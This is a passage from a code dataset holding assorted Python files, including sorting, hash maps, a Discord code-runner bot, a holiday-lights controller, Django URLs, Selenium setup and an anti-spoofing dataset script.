sublists\ndef split(my_list):\n \n # print(\"Split \" + str(my_list)) # Delete comment to print whenever program splits list to smaller sublists\n\n # 1 or 0 length my_list/substring is sorted\n if len(my_list) > 1:\n mid = len(my_list)//2\n left = my_list[:mid]\n right = my_list[mid:]\n \n # Recursively splits my_list until sublist reaches length of 1\n split(left)\n split(right)\n\n # Merges sorted sublists\n merge(my_list, left, right)\n\n# Merges sorted sublists\ndef merge(my_list, left, right):\n \n i = j = k = 0\n \n # If both sides have still unsorted numbers\n while i < len(left) and j < len(right):\n\n # Change to descending sort by changing '<' to '>'\n if left[i] < right[j]:\n my_list[k] = left[i]\n i += 1\n else:\n my_list[k] = right[j]\n j += 1\n k += 1\n \n # If other sublist is empty, push rest of other side to the my_list due it's already sorted \n while i < len(left):\n my_list[k] = left[i]\n i += 1\n k += 1\n while j < len(right):\n my_list[k] = right[j]\n j += 1\n k += 1\n \n # print(\"Merge \" + str(my_list)) # Delete comment to print when program merges two sublists\n\ndef main():\n print(\"Executed main from mergesort.py\")\n\nif(__name__ == '__main__'):\n main()\n","sub_path":"sorting_algorithms/mergesort/mergesort.py","file_name":"mergesort.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"555029631","text":"import logging\nfrom sklearn.metrics import roc_auc_score\nimport numpy as np\nfrom torchxrayvision import datasets as xrv_datasets\n\nimport feature_extractors\nimport models\nimport data\n\n\ndef get_test_folds_indices(dataset_length, folds):\n permutation = np.random.permutation(dataset_length)\n size = dataset_length // folds\n remainder = dataset_length % folds\n sizes = np.array([size] * folds)\n sizes[:remainder] += 1\n assert sizes.sum() == dataset_length\n points = 
np.cumsum(sizes)[:-1]\n split = np.split(permutation, points)\n return split\n\n\ndef partitions_generator(dataset, folds):\n test_folds_indices = get_test_folds_indices(len(dataset), folds)\n for test_indices in test_folds_indices:\n train_mapping = np.ones(len(dataset))\n for i in test_indices:\n train_mapping[i] = 0\n train_indices = np.argwhere(train_mapping == 1).flatten()\n test_indices = np.argwhere(train_mapping == 0).flatten()\n train_dataset = xrv_datasets.SubsetDataset(dataset, train_indices)\n test_dataset = xrv_datasets.SubsetDataset(dataset, test_indices)\n yield train_dataset, test_dataset\n\n\ndef main():\n d_covid19 = data.CombinedDataset()\n logging.info(f'entire dataset length is {len(d_covid19)}')\n feature_extractor = feature_extractors.NeuralNetFeatureExtractor()\n Model = models.LinearRegression\n\n for i, (train_dataset, test_dataset) in enumerate(partitions_generator(d_covid19, 10)):\n logging.info(\n f'train size {len(train_dataset)}, test size {len(test_dataset)}')\n\n features_train = feature_extractor.extract(train_dataset)\n labels_train = train_dataset.labels\n features_test = feature_extractor.extract(test_dataset)\n labels_test = test_dataset.labels\n\n model = Model()\n model.fit(features_train, labels_train)\n predictions = model.predict(features_test)\n\n performance = np.zeros(len(test_dataset.pathologies))\n\n for i in range(len(test_dataset.pathologies)):\n if np.unique(labels_test[:, i]).shape[0] > 1:\n performance[i] = roc_auc_score(labels_test[:, i],\n predictions[i][:, 1])\n\n logging.info(f'At fold {i} per class AUC is:\\n{performance}')\n\n\nif __name__ == '__main__':\n logging.getLogger().setLevel(logging.INFO)\n main()\n","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"334156860","text":"class HashMap:\r\n def __init__(self, array_size):\r\n self.array_size = array_size\r\n self.array = [None for item in range(array_size)]\r\n\r\n def hash(self, key, count_collisions=0):\r\n key_bytes = key.encode()\r\n hash_code = sum(key_bytes)\r\n return hash_code + count_collisions\r\n\r\n def compressor(self, hash_code):\r\n return hash_code % self.array_size\r\n\r\n def assign(self, key, value):\r\n array_index = self.compressor(self.hash(key))\r\n current_array_value = self.array[array_index]\r\n\r\n if current_array_value is None:\r\n self.array[array_index] = [key, value]\r\n return\r\n\r\n if current_array_value[0] == key:\r\n self.array[array_index] = [key, value]\r\n return\r\n\r\n # Collision!\r\n\r\n number_collisions = 1\r\n\r\n while(current_array_value[0] != key):\r\n new_hash_code = self.hash(key, number_collisions)\r\n new_array_index = self.compressor(new_hash_code)\r\n current_array_value = self.array[new_array_index]\r\n\r\n if current_array_value is None:\r\n self.array[new_array_index] = [key, value]\r\n return\r\n\r\n if current_array_value[0] == key:\r\n self.array[new_array_index] = [key, value]\r\n return\r\n\r\n number_collisions += 1\r\n\r\n return\r\n\r\n def retrieve(self, key):\r\n array_index = self.compressor(self.hash(key))\r\n possible_return_value = self.array[array_index]\r\n\r\n if possible_return_value is None:\r\n return None\r\n\r\n if possible_return_value[0] == key:\r\n return possible_return_value[1]\r\n\r\n retrieval_collisions = 1\r\n\r\n while (possible_return_value != key):\r\n new_hash_code = self.hash(key, retrieval_collisions)\r\n retrieving_array_index = 
self.compressor(new_hash_code)\r\n            possible_return_value = self.array[retrieving_array_index]\r\n\r\n            if possible_return_value is None:\r\n                return None\r\n\r\n            if possible_return_value[0] == key:\r\n                return possible_return_value[1]\r\n\r\n            retrieval_collisions += 1\r\n\r\n        return\r\n\r\nhash = HashMap(20)\r\n\r\nhash.assign('amazon', 'google')\r\nhash.assign('google', 'facebook')\r\nhash.assign('facebook', 'amazon')\r\n\r\n#print(hash.retrieve('amazon'))\r\n#print(hash.retrieve('google'))\r\n#print(hash.retrieve('facebook'))\r\n\r\nclass Node:\r\n    def __init__(self, value):\r\n        self.value = value\r\n        self.next_node = None\r\n\r\n    def get_value(self):\r\n        return self.value\r\n\r\n    def get_next_node(self):\r\n        return self.next_node\r\n\r\n    def set_next_node(self, next_node):\r\n        self.next_node = next_node\r\n\r\n\r\nclass LinkedList:\r\n    def __init__(self, head_node=None):\r\n        self.head_node = head_node\r\n\r\n    def insert(self, new_node):\r\n        current_node = self.head_node\r\n\r\n        if not current_node:\r\n            self.head_node = new_node\r\n\r\n        while (current_node):\r\n            next_node = current_node.get_next_node()\r\n            if not next_node:\r\n                current_node.set_next_node(new_node)\r\n            current_node = next_node\r\n\r\n    def __iter__(self):\r\n        current_node = self.head_node\r\n        while (current_node):\r\n            yield current_node.get_value()\r\n            current_node = current_node.get_next_node()\r\n\r\n\r\nflower_definitions = [\r\n['begonia', 'cautiousness'],\r\n['chrysanthemum', 'cheerfulness'],\r\n['carnation', 'memories'],\r\n['daisy', 'innocence'],\r\n['hyacinth', 'playfulness'],\r\n['lavender', 'devotion'],\r\n['magnolia', 'dignity'],\r\n['morning glory', 'unrequited love'],\r\n['periwinkle', 'new friendship'],\r\n['poppy', 'rest'],\r\n['rose', 'love'],\r\n['snapdragon', 'grace'],\r\n['sunflower', 'longevity'],\r\n['wisteria', 'good luck']\r\n]\r\n\r\nclass HashMap1:\r\n    def __init__(self, size):\r\n        self.array_size = size\r\n        self.array = [LinkedList() for i in range(self.array_size)]\r\n\r\n    def hash(self, key):\r\n        key_bytes = key.encode()\r\n        return sum(key_bytes)\r\n\r\n    def compress(self, hash_code):\r\n        return hash_code % self.array_size\r\n\r\n    def assign(self, key, value):\r\n        array_index = self.compress(self.hash(key))\r\n        #self.array[array_index] = [key, value]\r\n        payload = Node([key, value])\r\n        list_at_array = self.array[array_index]\r\n\r\n        for item in list_at_array:\r\n            if key == item[0]:\r\n                item[1] = value\r\n                return\r\n\r\n        list_at_array.insert(payload)\r\n\r\n\r\n    def retrieve(self, key):\r\n        array_index = self.compress(self.hash(key))\r\n        list_at_index = self.array[array_index]\r\n\r\n        for item in list_at_index:\r\n            if item[0] == key:\r\n                return item[1]\r\n\r\n        return None\r\n\r\nblossom = HashMap1(len(flower_definitions))\r\n\r\nfor item in flower_definitions:\r\n    blossom.assign(item[0], item[1])\r\n\r\nprint(blossom.retrieve('morning glory'))","sub_path":"Hash.py","file_name":"Hash.py","file_ext":"py","file_size_in_byte":4706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"185417639","text":"from functools import cache\nimport discord\nfrom discord.ext import commands\nfrom jishaku.codeblocks import codeblock_converter, Codeblock\nimport aiohttp\nfrom .backend.paginator.paginator import paginator, input\nfrom discord.ext.commands import BucketType\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\nclass Coding(commands.Cog):\n    def __init__(self, bot):\n        self.bot = bot\n        self.rtfm_cache = {}\n\n    @commands.cooldown(1, 5, BucketType.user)\n    
@commands.command(name=\"run\")\n    async def _run(self, ctx, language, *, code: codeblock_converter):\n        '''\n        Run a piece of code in the given language\n        '''\n        timeout = aiohttp.ClientTimeout(total=60)\n        with ctx.typing():\n            if not code.content:\n                return await ctx.error(\"Please supply some code!\", reply=True)\n            query = {\n                \"language\": language,\n                \"source\": code[1],\n            }\n            async with aiohttp.ClientSession(timeout=timeout) as cs:\n                async with cs.post(\"https://emkc.org/api/v1/piston/execute\", data=query) as r:\n                    resp = await r.json()\n\n            if resp.get(\"message\", None):\n                return await ctx.error(resp.get(\"message\"))\n\n            else:\n                if resp[\"ran\"]:\n                    result = resp[\"output\"].replace(\"`\", \"`\\u200b\")\n                    width = 2000\n                    pages = [result[i:i + width]\n                             for i in range(0, len(result), width)]\n\n                    embeds = []\n                    for index, item in enumerate(pages):\n                        if index == 0:\n                            embed = discord.Embed(\n                                title=f\"Ran in {resp['language']}\", description=f\"```{code.language}\\n{item}```\", colour=self.bot.good_embed_colour)\n                        else:\n                            embed = discord.Embed(\n                                description=f\"```{code.language}\\n{item}```\", colour=self.bot.good_embed_colour)\n                        embeds.append(input(embed, None))\n                    embedpaginator = paginator(\n                        ctx, remove_reactions=True, footer=True)\n                    embedpaginator.add_reaction(\"\\U000023ea\", \"first\")\n                    embedpaginator.add_reaction(\"\\U000025c0\", \"back\")\n                    embedpaginator.add_reaction(\"\\U0001f5d1\", \"delete\")\n                    embedpaginator.add_reaction(\"\\U000025b6\", \"next\")\n                    embedpaginator.add_reaction(\"\\U000023e9\", \"last\")\n                    await embedpaginator.send(embeds)\n                else:\n                    await ctx.reply(str(resp))\n    \n\ndef setup(bot):\n    bot.add_cog(Coding(bot))\n","sub_path":"bot/cogs/Coding.py","file_name":"Coding.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"60867167","text":"\nstringLength = 200\ndefaultConfig = {\n    \"pattern\": \"None\",\n}\n\nfrom ha import *\nfrom ha.interfaces.neopixelInterface import *\nfrom ha.interfaces.fileInterface import *\nfrom ha.controls.holidayLightControl import *\nfrom ha.rest.restServer import *\n\n# dictionary of patterns\npatterns = {\"onPattern\": [on],\n            \"offPattern\": [off],\n            \"whitePattern\": [white],\n            \"pinkPattern\": [pink],\n            \"redPattern\": [red],\n            \"orangePattern\": [orange],\n            \"yellowPattern\": [yellow],\n            \"greenPattern\": [green],\n            \"bluePattern\": [blue],\n            \"purplePattern\": [purple],\n            \"cyanPattern\": [cyan],\n            \"magentaPattern\": [magenta],\n            \"rustPattern\": [rust],\n            \"indigoPattern\": [indigo],\n            \"christmasPattern\": 3*[red]+3*[green],\n            \"hanukkahPattern\": 7*[blue]+3*[white],\n            \"halloweenPattern\": 5*[orange]+3*[rust]+2*[purple],\n            \"valentinesPattern\": 1*[white]+2*[pink]+5*[red]+2*[pink],\n            \"stpatricksPattern\": [green],\n            \"maydayPattern\": [red],\n            \"mardigrasPattern\": 3*[purple]+3*[yellow]+3*[green],\n            \"presidentsPattern\": 3*[red]+3*[white]+3*[blue],\n            \"july4Pattern\": 5*[red]+5*[white]+5*[blue],\n            \"bastillePattern\": 10*[red]+10*[white]+10*[blue],\n            \"cincodemayoPattern\": 10*[green]+10*[white]+10*[red],\n            \"easterPattern\": [yellow]+[blue]+[green]+[cyan]+[magenta],\n            \"swedenPattern\": 5*[blue]+5*[yellow],\n            \"canadaPattern\": 5*[red]+5*[white],\n            \"fallPattern\": 5*[red]+5*[orange]+5*[rust]+5*[orange],\n            \"pridePattern\": [pink]+[red]+[orange]+[yellow]+[green]+[blue]+[purple],\n            \"holiPattern\": [red]+[yellow]+[blue]+[green]+[orange]+[purple]+[pink]+[magenta],\n            \"columbusPattern\": [green]+[white]+[red],\n            
\"mlkPattern\": [white]+[red]+[yellow]+[rust],\n \"spectrumPattern\": [red]+[orange]+[yellow]+[green]+[blue]+[purple],\n }\n\nstateChangeEvent = threading.Event()\n\nif __name__ == \"__main__\":\n stateChangeEvent = threading.Event()\n\n # Interfaces\n neopixelInterface = NeopixelInterface(\"neopixelInterface\", None, length=stringLength, event=stateChangeEvent)\n configData = FileInterface(\"configData\", fileName=stateDir+\"lights.conf\", event=stateChangeEvent, initialState=defaultConfig)\n\n offLights = HolidayLightControl(\"None\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"offPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"None\")\n valentinesLights = HolidayLightControl(\"Valentines day\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"valentinesPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Valentines day\")\n mardigrasLights = HolidayLightControl(\"Mardi gras\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"mardigrasPattern\"],\n animation=SparkleAnimation(rate=5))],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Mardi gras\")\n presidentsLights = HolidayLightControl(\"Presidents day\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"presidentsPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Presidents day\")\n stpatricksLights = HolidayLightControl(\"St Patricks day\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"stpatricksPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"St Patricks day\")\n maydayLights = HolidayLightControl(\"May day\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"maydayPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"May day\")\n easterLights = HolidayLightControl(\"Easter\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"easterPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Easter\")\n cincodemayoLights = HolidayLightControl(\"Cinco de Mayo\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"cincodemayoPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Cinco de mayo\")\n swedenLights = HolidayLightControl(\"Sweden day\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"swedenPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Sweden day\")\n canadaLights = HolidayLightControl(\"Canada day\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"canadaPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Canada day\")\n prideLights = HolidayLightControl(\"Gay pride\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"pridePattern\"],\n animation=SparkleAnimation(rate=3))],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Gay pride\")\n flagLights = HolidayLightControl(\"Flag day\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"presidentsPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Flag day\")\n july4Lights = HolidayLightControl(\"4th of July\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"july4Pattern\"],\n 
animation=SparkleAnimation(rate=1))],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"4th of july\")\n bastilleLights = HolidayLightControl(\"Bastille day\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"bastillePattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Bastille day\")\n fallLights = HolidayLightControl(\"Fall\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"fallPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Fall\")\n halloweenLights = HolidayLightControl(\"Halloween\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"halloweenPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Halloween\")\n electionLights = HolidayLightControl(\"Election day\", neopixelInterface,\n segments=[Segment(\"leftSegment\", 0, 112,\n pattern=10*[red]+10*[white]+10*[blue],\n animation=CrawlAnimation(direction=1)),\n Segment(\"centerSegment\", 112, 58,\n pattern=1*[red]+1*[white]+1*[blue],\n animation=SparkleAnimation(rate=1)),\n Segment(\"rightSegment\", 170, 173,\n pattern=10*[red]+10*[white]+10*[blue],\n animation=CrawlAnimation(direction=-1))],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Election day\")\n christmasLights = HolidayLightControl(\"Christmas\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"christmasPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Christmas\")\n hanukkahLights = HolidayLightControl(\"Hanukkah\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"hanukkahPattern\"])],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Hanukkah\")\n testLights = HolidayLightControl(\"Test\", neopixelInterface,\n segments=[Segment(\"all\", 0, stringLength,\n pattern=patterns[\"spectrumPattern\"],\n animation=CrawlAnimation(direction=1))],\n type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Test\")\n\n holidayLightControls = Collection(\"HolidayLightControls\", resources=[offLights, valentinesLights, presidentsLights, mardigrasLights, stpatricksLights,\n easterLights, maydayLights, cincodemayoLights, swedenLights, prideLights, flagLights, canadaLights, july4Lights, bastilleLights,\n fallLights, halloweenLights, electionLights, christmasLights, hanukkahLights,\n testLights])\n # Persistent config data\n xmasTreePattern = MultiControl(\"xmasTreePattern\", configData, \"pattern\", values=list(holidayLightControls.keys()),\n group=[\"Lights\", \"Holiday\"], label=\"Xmas tree pattern\")\n\n# Tasks\n # 2019\n # holidayTasks = [\n # Task(\"OffTask\", SchedTime( hour=12, minute=0), holiday, \"None\"),\n # Task(\"valentinesTask\", SchedTime(year=2019, month=Feb, day=[13,14], hour=12, minute=0), holiday, \"Valentines day\"),\n # Task(\"presidentsTask\", SchedTime(year=2019, month=Feb, day=18, hour=12, minute=0), holiday, \"Presidents day\"),\n # Task(\"mardigrasTask\", SchedTime(year=2019, month=Mar, day=[2,3,4,5], hour=12, minute=0), holiday, \"Mardi gras\"),\n # Task(\"stpatricksTask\", SchedTime(year=2019, month=Mar, day=[16,17], hour=12, minute=0), holiday, \"St Patricks day\"),\n # Task(\"easterTask\", SchedTime(year=2019, month=Apr, day=[20,21], hour=12, minute=0), holiday, \"Easter\"),\n # Task(\"maydayTask\", SchedTime(year=2019, month=May, day=1, hour=12, minute=0), holiday, \"May day\"),\n # Task(\"cincodemayoTask\", SchedTime(year=2019, month=May, day=5, hour=12, 
minute=0), holiday, \"Cinco de Mayo\"),\n # Task(\"swedenTask\", SchedTime(year=2019, month=Jun, day=6, hour=12, minute=0), holiday, \"Sweden day\"),\n # Task(\"prideTask\", SchedTime(year=2019, month=Jun, day=9, hour=12, minute=0), holiday, \"Pride day\"),\n # Task(\"flagTask\", SchedTime(year=2019, month=Jun, day=14, hour=12, minute=0), holiday, \"Flag day\"),\n # Task(\"canadaTask\", SchedTime(year=2019, month=Jul, day=1, hour=12, minute=0), holiday, \"Canada day\"),\n # Task(\"july3Task\", SchedTime(year=2019, month=Jul, day=3, hour=12, minute=0), holiday, \"Presidents day\"),\n # Task(\"july4Task\", SchedTime(year=2019, month=Jul, day=4, hour=12, minute=0), holiday, \"4th of July\"),\n # Task(\"bastilleTask\", SchedTime(year=2019, month=Jul, day=14, hour=12, minute=0), holiday, \"Bastille day\"),\n # Task(\"fallTask\", SchedTime(year=2019, month=Sep, day=21, hour=12, minute=0), holiday, \"Fall\"),\n # Task(\"halloweenTask\", SchedTime(year=2019, month=Oct, day=31, hour=12, minute=0), holiday, \"Halloween\"),\n # Task(\"thanksgivingTask\", SchedTime(year=2019, month=Nov, day=28, hour=12, minute=0), holiday, \"Fall\"),\n # Task(\"christmasTask\", SchedTime(year=2019, month=Dec, hour=12, minute=0), holiday, \"Christmas\"),\n # Task(\"hanukkahTask\", SchedTime(year=2019, month=Dec, day=22, hour=12, minute=0), holiday, \"Hanukkah\"),\n # ]\n\n # Resources\n xmasTree = AliasControl(\"xmasTree\", None, holidayLightControls, xmasTreePattern, type=\"light\", group=[\"Lights\", \"Holiday\"], label=\"Xmas tree\")\n resources = Collection(\"resources\", resources=[xmasTree, xmasTreePattern])\n\n\n # Light tasks\n # resources.addRes(Task(\"xmasLightsOnSunset\", SchedTime(event=\"sunset\"), \"xmasLights\", 1, resources=resources, group=\"Lights\"))\n # resources.addRes(Task(\"xmasLightsOffMidnight\", SchedTime(hour=[23,0], minute=[00]), \"xmasLights\", 0, resources=resources, group=\"Lights\"))\n # resources.addRes(Task(\"xmasLightsOffSunrise\", SchedTime(event=\"sunrise\"), \"xmasLights\", 0, resources=resources, group=\"Lights\"))\n # resources.addRes(Task(\"xmasTreeOnXmas\", SchedTime(month=[12], day=[25], hour=[7], minute=[00]), \"xmasTree\", 1, resources=resources))\n\n # Schedule\n # schedule = Schedule(\"schedule\", tasks=holidayTasks)\n # schedule.addTask(resources[\"xmasLightsOnSunset\"])\n # schedule.addTask(resources[\"xmasLightsOffMidnight\"])\n # schedule.addTask(resources[\"xmasLightsOffSunrise\"])\n # schedule.addTask(resources[\"xmasTreeOnXmas\"])\n\n restServer = RestServer(\"xmastree\", resources, event=stateChangeEvent, label=\"Xmas tree\")\n\n # Start interfaces\n configData.start()\n neopixelInterface.start()\n # schedule.start()\n restServer.start()\n","sub_path":"xmastreeApp.py","file_name":"xmastreeApp.py","file_ext":"py","file_size_in_byte":15192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"544311654","text":"\"\"\"\n Coury Richards\n CodeEval\n For some fun\n 22JUN2015\n\"\"\"\nclass PrimeFinder:\n\n def __init__(self, largest):\n self. 
prime_list = []\n        self.prime_list_len = 0\n        self.largest = largest\n        \n    #Start Getters/Setters\n    \n    def get_num(self, i):\n        return self.prime_list[i]\n\n    def set_largest(self, val):\n        self.largest = val\n\n    def get_largest(self):\n        return self.largest\n\n    def set_prime_list_len(self):\n        self.prime_list_len = len(self.get_prime_list())\n    \n    def get_prime_list_len(self):\n        return self.prime_list_len\n\n    def set_prime_list(self):\n        num = 0\n        while (self.get_prime_list_len() < self.get_largest()):\n            if self.check_prime(num):\n                self.prime_list.append(num)\n            num += 1\n            self.set_prime_list_len()\n\n    def get_prime_list(self):\n        return self.prime_list\n    \n    #End Getters/Setters\n\n    def check_prime(self,num):\n        #0 and 1 are not prime\n        if num > 1:\n            #Check all the other exceptions\n            if self.check_two(num):\n                return False\n            elif self.check_three(num):\n                return False\n            elif self.check_five(num):\n                return False\n            #Check all the remaining candidate factors\n            else:\n                return self.check_factorial(num)\n        else:\n            return False\n\n    @staticmethod\n    def check_two(num):\n        if num == 2:\n            return False\n        elif num % 2 == 0:\n            return True\n        else: \n            return False\n    \n    @staticmethod\n    def check_three(num):\n        if num == 3:\n            return False\n        elif num % 3 == 0:\n            return True\n        else: \n            return False\n    \n    @staticmethod\n    def check_five(num):\n        if num == 5:\n            return False\n        elif num % 5 == 0:\n            return True\n        else:\n            return False\n    \n    @staticmethod\n    def check_factorial(num):\n        #Checks candidate divisors of the form 6k-1 and 6k+1 up to sqrt(num)\n        #If divisible by any of them then not prime\n        for n in range(5, int(num ** 0.5) + 1, 6):\n            #These are for troubleshooting\n            #print(str(num) + \"%\" + str(n) + \"=\" + str(num % n))\n            #print(str(num) + \"%\" + str(n+2) + \"=\" + str(num % (n + 2)))\n            if num % n == 0 or num % (n + 2) == 0:\n                return False\n        return True\n    \n    def find_prime(self):\n        self.set_prime_list()\n\npp = PrimeFinder(1000)\npp.find_prime()\nparr = pp.get_prime_list()\nres = 0\n\nfor n in parr:\n    res += n\n\nprint(res)\n\n\n","sub_path":"python/AddPrime/AddPrime.py3","file_name":"AddPrime.py3","file_ext":"py3","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"256451601","text":"from django.conf.urls import include, url\nfrom . 
import views\n\nurlpatterns = [\n    url(r'^home/', views.post_list),\n    url(r'^post/(?P<pk>[0-9]+)/$', views.post_detail),\n    url(r'^new/', views.post_new),\n    url(r'^$', views.logar),\n    url(r'user_new/', views.user_new),\n    url(r'^post/(?P<pk>[0-9]+)/edit', views.post_edit),\n    url(r'^post/(?P<pk>[0-9]+)/delete', views.post_delete),\n]","sub_path":"projeto/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"81670457","text":"from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n    # Examples:\n    # url(r'^$', 'sblog.views.home', name='home'),\n    # url(r'^blog/', include('blog.urls')),\n\n    # url(r'^admin/', include(admin.site.urls)),\n    url(r'^loginReg/',include('sblog.apps.login.urls')),\n\n    url(r'^',include('sblog.apps.index.urls')),\n)\n","sub_path":"sblog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"561421961","text":"#-*- coding:utf8 -*-\nfrom selenium import webdriver\nfrom selenium.webdriver.ie import webdriver as ie_webdriver\n\nclass DriverTool:\n\n    @classmethod\n    def get_driver(cls,selenium_hub,browser_type):\n        driver=None\n        browser_type=browser_type.lower()\n        if browser_type=='ie':\n            opt = ie_webdriver.Options()\n            opt.force_create_process_api = True\n            opt.ensure_clean_session = True\n            opt.add_argument('-private')\n            ie_capabilities = webdriver.DesiredCapabilities.INTERNETEXPLORER.copy()\n            ie_capabilities.update(opt.to_capabilities())\n            driver = webdriver.Remote(selenium_hub, desired_capabilities=ie_capabilities)\n        elif browser_type=='firefox':\n            driver = webdriver.Remote(selenium_hub, webdriver.DesiredCapabilities.FIREFOX.copy())\n        elif browser_type=='chrome':\n            driver = webdriver.Remote(selenium_hub, webdriver.DesiredCapabilities.CHROME.copy())\n        else:\n            return driver\n        driver.maximize_window()\n        driver.delete_all_cookies()\n        return driver","sub_path":"common/selenium/driverTool.py","file_name":"driverTool.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
{"seq_id":"651126842","text":"import os\nimport json\nfrom tqdm import tqdm\n\n\ndef create_json(mode='train', root_folder='/home/prokofiev/pytorch/antispoofing/CelebA_Spoof'):\n    if mode == 'test':\n        list_path = os.path.join(root_folder, 'metas/intra_test/test_label.json')\n        save_file = os.path.join(root_folder, 'metas/intra_test/items_test.json')\n    else:\n        assert mode == 'train'\n        list_path = os.path.join(root_folder, 'metas/intra_test/train_label.json')\n        save_file = os.path.join(root_folder, 'metas/intra_test/items_train.json')\n    indx=0\n    items = {}\n    with open('small_crops.txt', 'r') as f:\n        small_crops = map(lambda x: x.strip(), f.readlines())\n        set_ = set(small_crops)\n    with open(list_path, 'r') as f:\n        data = json.load(f)\n    for path in tqdm(data, 'Reading dataset info...', leave=False):\n        labels = data[path] # create list with labels\n        bbox_path = os.path.join(root_folder, os.path.splitext(path)[0] + '_BB.txt')\n        bbox_f = open(bbox_path, 'r')\n        bbox_info = bbox_f.readline().strip().split()[0:4]\n        bbox = [int(x) for x in bbox_info] # create bbox with labels\n        if len(bbox) < 4 or bbox[2] < 3 or bbox[3] < 3: # filter not existing or too small boxes\n            print('Bad bounding box: ', bbox, path)\n            continue\n        if path in set_:\n            
print('Bad cropp: ', path)\n items[indx] = {'path':path, 'labels':labels, 'bbox':bbox}\n indx += 1\n with open(save_file, 'w') as f:\n json.dump(items, f, indent = 4)\n\n \nif __name__ == '__main__':\n create_json(mode='train')\n create_json(mode='test')\n","sub_path":"create_json.py","file_name":"create_json.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"10993334","text":"import cv2\nimport numpy as np\nimport pyautogui\n\ndef nothing(x):\n pass\n\ndef swap( array, i, j):\n temp = array[i]\n array[i] = array[j]\n array[j] = temp\n\ncap = cv2.VideoCapture(0)\ncv2.namedWindow('Parameters')\n'''\ncv2.createTrackbar('Hue','Parameters',0,255,nothing)\ncv2.createTrackbar('Sat','Parameters',0,255,nothing)\ncv2.createTrackbar('Val','Parameters',0,255,nothing)\n'''\ncenter=(0,0)\n\nwhile(1):\n\n # Take each frame\n ret , frameinv = cap.read()\n frame=cv2.flip( frameinv, 1)\n\n # Convert BGR to HSV\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n# hue = cv2.getTrackbarPos('Hue','Parameters')\n # sat = cv2.getTrackbarPos('Sat','Parameters')\n # val = cv2.getTrackbarPos('Val','Parameters')\n # define range of blue color in HSV\n lower = np.array([100,70,10])\n upper = np.array([140,255,255])\n\n\n # Threshold the HSV image to get only blue colors\n mask = cv2.inRange(hsv, lower, upper)\n _, contour, 